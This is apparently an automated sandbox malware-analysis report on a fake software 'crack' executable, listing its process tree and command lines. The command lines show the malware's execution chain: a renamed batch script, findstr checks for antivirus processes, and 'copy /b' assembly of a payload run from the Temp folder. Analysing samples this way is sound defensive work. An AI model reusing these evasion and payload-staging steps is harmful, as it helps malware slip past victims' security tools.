                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1616&rtt_var=628&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=981&delivery_rate=1711606&cwnd=79&unsent_bytes=0&cid=fa4287faa32d2f46&ts=887&x=0"
                                                                                                                2024-12-24 12:53:01 UTC  54  IN  Data Raw: 33 30 0d 0a 6c 2b 77 47 31 44 59 6f 62 4f 4c 35 7a 56 6d 72 53 46 4a 56 57 31 4d 53 77 65 31 4d 6d 57 50 72 70 52 62 66 4c 57 50 32 55 49 33 4d 73 51 3d 3d 0d 0a
                                                                                                                Data Ascii: 30l+wG1DYobOL5zVmrSFJVW1MSwe1MmWPrpRbfLWP2UI3MsQ==
                                                                                                                2024-12-24 12:53:01 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Target ID:0
                                                                                                                Start time:07:52:14
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:927'079'465 bytes
                                                                                                                MD5 hash:636555B743CE6AEB326544EB56E8B5E9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:07:52:15
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:07:52:16
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:tasklist
                                                                                                                Imagebase:0x30000
                                                                                                                File size:79'360 bytes
                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr /I "opssvc wrsa"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:tasklist
                                                                                                                Imagebase:0x30000
                                                                                                                File size:79'360 bytes
                                                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:07:52:17
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:cmd /c md 459250
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:8
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:findstr /V "Sorry" Branches
                                                                                                                Imagebase:0x240000
                                                                                                                File size:29'696 bytes
                                                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:07:52:18
                                                                                                                Start date:24/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

Target ID:10
Start time:07:52:18
Start date:24/12/2024
Path:C:\Users\user\AppData\Local\Temp\459250\Spa.com
Wow64 process (32bit):true
Commandline:Spa.com y
Imagebase:0x450000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:11
Start time:07:52:19
Start date:24/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x6a0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

No disassembly